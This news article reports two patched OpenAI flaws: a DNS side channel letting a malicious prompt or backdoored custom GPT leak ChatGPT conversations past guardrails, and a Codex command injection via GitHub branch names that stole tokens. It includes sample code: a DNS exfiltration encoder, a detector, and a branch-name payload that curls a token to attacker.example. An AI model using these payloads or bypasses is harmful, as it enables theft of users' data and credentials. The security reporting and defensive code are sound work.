OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
2026-03-30 18:05:00 Author: thehackernews.com

A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.

"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent."

Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing and block direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel in the Linux runtime that the artificial intelligence (AI) agent uses for code execution and data analysis.

Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism" by encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.
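DNS-based exfiltration of this kind generally works by smuggling data inside the hostnames being looked up, since even a sandboxed environment that blocks outbound HTTP often still performs DNS resolution. The sketch below illustrates the generic encoding technique (not Check Point's actual payload): data is hex-encoded, split into DNS labels, and appended to an attacker-controlled domain (`exfil.example.com` is a placeholder), so that merely resolving each name delivers the chunks to the attacker's nameserver.

```python
# Illustrative sketch of generic DNS exfiltration encoding. The domain and
# chunking scheme are hypothetical examples, not the payload from the report.
def encode_for_dns(data: bytes, attacker_domain: str = "exfil.example.com",
                   label_len: int = 60) -> list[str]:
    """Hex-encode data and split it into DNS labels (max 63 bytes each)."""
    hexed = data.hex()
    chunks = [hexed[i:i + label_len] for i in range(0, len(hexed), label_len)]
    # One query name per chunk, tagged with a sequence number for reassembly
    # on the attacker's authoritative nameserver.
    return [f"{i}-{chunk}.{attacker_domain}" for i, chunk in enumerate(chunks)]

for qname in encode_for_dns(b"session token: abc123"):
    print(qname)
    # In a real attack the sandbox would simply resolve each name, e.g.:
    # socket.getaddrinfo(qname, 80)  # the DNS lookup itself carries the data
```

Because the lookup goes through the platform's own resolver, no direct connection to the attacker is ever made, which is what makes the channel invisible to guardrails that only watch explicit outbound requests.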

In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, as the AI system assumes the environment is isolated.

As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat is magnified when the technique is embedded inside custom GPTs, as the malicious logic can be baked into the GPT itself, removing the need to trick a user into pasting a specially crafted prompt.

"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.
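One such independent layer is egress monitoring that flags DNS queries whose labels look like encoded data. The sketch below is a deliberately minimal heuristic (long labels composed almost entirely of hex characters); the thresholds are illustrative assumptions, and a production detector would combine several signals (query volume, entropy, domain reputation).

```python
# Minimal sketch of a DNS-exfiltration heuristic for an egress monitor.
# The label-length and hex-ratio thresholds are illustrative, not tuned.
HEX_CHARS = set("0123456789abcdef")

def looks_like_exfil(qname: str, max_label: int = 30,
                     hex_ratio: float = 0.9) -> bool:
    """Flag query names containing a long, hex-dominated label."""
    for label in qname.lower().rstrip(".").split("."):
        if len(label) > max_label:
            hexish = sum(c in HEX_CHARS for c in label) / len(label)
            if hexish >= hex_ratio:
                return True
    return False

print(looks_like_exfil("www.example.com"))  # False: short, ordinary labels
print(looks_like_exfil(
    "0123456789abcdef0123456789abcdef01234567.exfil.example.com"))  # True
```

A check like this would run at the resolver or network boundary, outside the AI vendor's own controls, which is the kind of independent visibility the quoted guidance calls for.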

"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.

"As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident."

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration.

"It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.

"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token – the same token Codex uses to authenticate with GitHub."

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. Because of this inadequacy, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
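The class of flaw described here is classic command injection: attacker-controlled input (the branch name) is interpolated into a shell command. The sketch below is a hypothetical reconstruction of the pattern (the actual Codex backend code is not public), contrasting the vulnerable string-building approach with passing arguments as a list plus input validation.

```python
# Hypothetical reconstruction of the flaw class, not Codex's actual code.
def checkout_unsafe(branch: str) -> str:
    # Vulnerable pattern: attacker-controlled input interpolated into a
    # shell command string. A branch name can smuggle extra commands.
    return f"git checkout {branch}"

malicious = "main; curl https://attacker.example/$(cat /tmp/token)"
print(checkout_unsafe(malicious))  # the '; curl ...' would run as a command

def checkout_safe(branch: str) -> list[str]:
    # Mitigation: validate the name, then pass arguments as a list so no
    # shell ever parses it (e.g. subprocess.run(checkout_safe(b), shell=False)).
    stripped = branch.replace("/", "").replace("-", "").replace("_", "").replace(".", "")
    if not stripped.isalnum():
        raise ValueError(f"invalid branch name: {branch!r}")
    return ["git", "checkout", "--", branch]

print(checkout_safe("feature/dns-fix"))
```

With the list form, `;`, `$()`, and backticks are delivered to `git` as literal bytes rather than interpreted by a shell, which closes this injection path regardless of what the branch name contains.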

"This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. It has been patched by OpenAI as of February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub. 

"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server."

The research also highlights a growing risk where the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls.

"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."



Source: https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html